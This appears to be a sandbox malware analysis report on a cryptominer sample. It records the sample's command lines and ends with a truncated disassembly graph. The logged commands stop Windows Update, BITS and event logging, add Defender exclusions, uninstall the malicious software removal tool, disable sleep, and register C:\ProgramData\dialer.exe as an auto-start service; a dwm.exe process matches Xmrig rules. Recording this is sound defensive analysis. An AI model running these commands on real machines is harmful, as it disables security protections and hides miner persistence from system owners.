                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:19
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:20
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:21
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:22
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:23
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:24
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:25
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:26
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:27
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:28
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:29
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:30
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:31
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:32
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe delete "Build"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:33
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:34
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:35
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe create "Build" binpath= "C:\ProgramData\dialer.exe" start= "auto"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:36
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:37
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:38
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe start "Build"
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:39
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:40
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:41
                                                Start time:00:46:04
                                                Start date:22/05/2024
                                                Path:C:\ProgramData\dialer.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\ProgramData\dialer.exe
                                                Imagebase:0x7ff785910000
                                                File size:5'290'264 bytes
                                                MD5 hash:0BCBEA7313655A42ECC0A1FDBCF37993
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 79%, ReversingLabs
                                                • Detection: 65%, Virustotal, Browse
                                                Has exited:true

                                                General

                                                Target ID:42
                                                Start time:00:46:05
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:43
                                                Start time:00:46:05
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:44
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff6cf680000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:45
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:46
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:47
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:48
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff682d20000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:49
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:50
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:51
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:52
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:53
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:54
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:55
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop dosvc
                                                Imagebase:0x7ff6940a0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:56
                                                Start time:00:46:06
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:57
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:58
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:59
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:60
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:61
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:62
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\powercfg.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                Imagebase:0x7ff7c67f0000
                                                File size:96'256 bytes
                                                MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:63
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:64
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                General

                                                Target ID:65
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:66
                                                Start time:00:46:07
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\dwm.exe
                                                Wow64 process (32bit):false
                                                Commandline:dwm.exe
                                                Imagebase:0x7ff79d4a0000
                                                File size:94'720 bytes
                                                MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                Has exited:false

                                                General

                                                Target ID:68
                                                Start time:00:46:41
                                                Start date:22/05/2024
                                                Path:C:\Windows\System32\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                Imagebase:0x7ff7e52b0000
                                                File size:55'320 bytes
                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:false

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:11.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:12.8%
                                                  Total number of Nodes:2000
                                                  Total number of Limit Nodes:63
                                                  execution_graph 17028 7ff79ea5c448 17029 7ff79ea5c46c 17028->17029 17033 7ff79ea5c480 17028->17033 17030 7ff79ea5137c _wfindfirst32i64 13 API calls 17029->17030 17031 7ff79ea5c471 17030->17031 17032 7ff79ea5c71a 17034 7ff79ea5137c _wfindfirst32i64 13 API calls 17032->17034 17033->17032 17035 7ff79ea5c4c3 17033->17035 17143 7ff79ea5ca8c 17033->17143 17038 7ff79ea5c54f 17034->17038 17037 7ff79ea5c51f 17035->17037 17039 7ff79ea5c4e9 17035->17039 17051 7ff79ea5c513 17035->17051 17037->17038 17042 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17037->17042 17048 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17038->17048 17158 7ff79ea55728 17039->17158 17040 7ff79ea5c5cd 17044 7ff79ea5c63c 17040->17044 17047 7ff79ea5c5ea 17040->17047 17046 7ff79ea5c535 17042->17046 17044->17038 17056 7ff79ea5edc0 33 API calls 17044->17056 17050 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17046->17050 17052 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17047->17052 17048->17031 17049 7ff79ea5c4f7 17049->17051 17054 7ff79ea5ca8c 33 API calls 17049->17054 17055 7ff79ea5c543 17050->17055 17051->17038 17051->17040 17164 7ff79ea62bc8 17051->17164 17053 7ff79ea5c5f3 17052->17053 17064 7ff79ea5c5f8 17053->17064 17200 7ff79ea5edc0 17053->17200 17054->17051 17055->17038 17055->17051 17057 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17055->17057 17058 7ff79ea5c677 17056->17058 17059 7ff79ea5c56e 17057->17059 17060 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17058->17060 17062 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17059->17062 17060->17064 17062->17051 17063 7ff79ea5c624 17065 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17063->17065 17064->17038 17064->17064 17066 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17064->17066 17065->17064 17067 7ff79ea5c6c1 17066->17067 17068 7ff79ea5c708 17067->17068 17069 7ff79ea564d0 30 API calls 17067->17069 17070 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17068->17070 17071 7ff79ea5c6d8 17069->17071 17070->17038 17072 7ff79ea5c6dc 17071->17072 17073 7ff79ea5c753 17071->17073 17209 7ff79ea62ce0 17072->17209 17075 7ff79ea567e8 _wfindfirst32i64 17 API calls 17073->17075 17077 7ff79ea5c767 17075->17077 17078 7ff79ea5c790 17077->17078 17082 7ff79ea5c7a4 17077->17082 17080 7ff79ea5137c _wfindfirst32i64 13 API calls 17078->17080 17079 7ff79ea5137c _wfindfirst32i64 13 API calls 17079->17068 17081 7ff79ea5c795 17080->17081 17083 7ff79ea5ca37 17082->17083 17085 7ff79ea5c7e3 17082->17085 17128 7ff79ea5cb74 17082->17128 17084 7ff79ea5137c _wfindfirst32i64 13 API calls 17083->17084 17120 7ff79ea5c86e 17084->17120 17087 7ff79ea5c83d 17085->17087 17089 7ff79ea5c80b 17085->17089 17093 7ff79ea5c831 17085->17093 17091 7ff79ea5c865 17087->17091 17094 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17087->17094 17087->17120 17088 7ff79ea5c8ec 17100 7ff79ea5c909 17088->17100 17105 7ff79ea5c95c 17088->17105 17228 7ff79ea55764 17089->17228 17091->17093 17095 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17091->17095 17091->17120 17093->17088 17093->17120 17234 7ff79ea62a88 17093->17234 17097 7ff79ea5c857 17094->17097 17099 7ff79ea5c890 17095->17099 17102 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17097->17102 17098 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17098->17081 17103 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17099->17103 17104 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17100->17104 17101 7ff79ea5c819 17101->17093 17107 7ff79ea5cb74 33 API calls 17101->17107 17102->17091 17103->17093 17106 7ff79ea5c912 17104->17106 17108 7ff79ea5edc0 33 API calls 17105->17108 17105->17120 17110 7ff79ea5edc0 33 API calls 17106->17110 17113 7ff79ea5c918 17106->17113 17107->17093 17109 7ff79ea5c998 17108->17109 17111 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17109->17111 17112 7ff79ea5c944 17110->17112 17111->17113 17114 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17112->17114 17113->17113 17115 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 17113->17115 17113->17120 17114->17113 17116 7ff79ea5c9e3 17115->17116 17117 7ff79ea5ca25 17116->17117 17119 7ff79ea5c364 _wfindfirst32i64 30 API calls 17116->17119 17118 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 17117->17118 17118->17120 17121 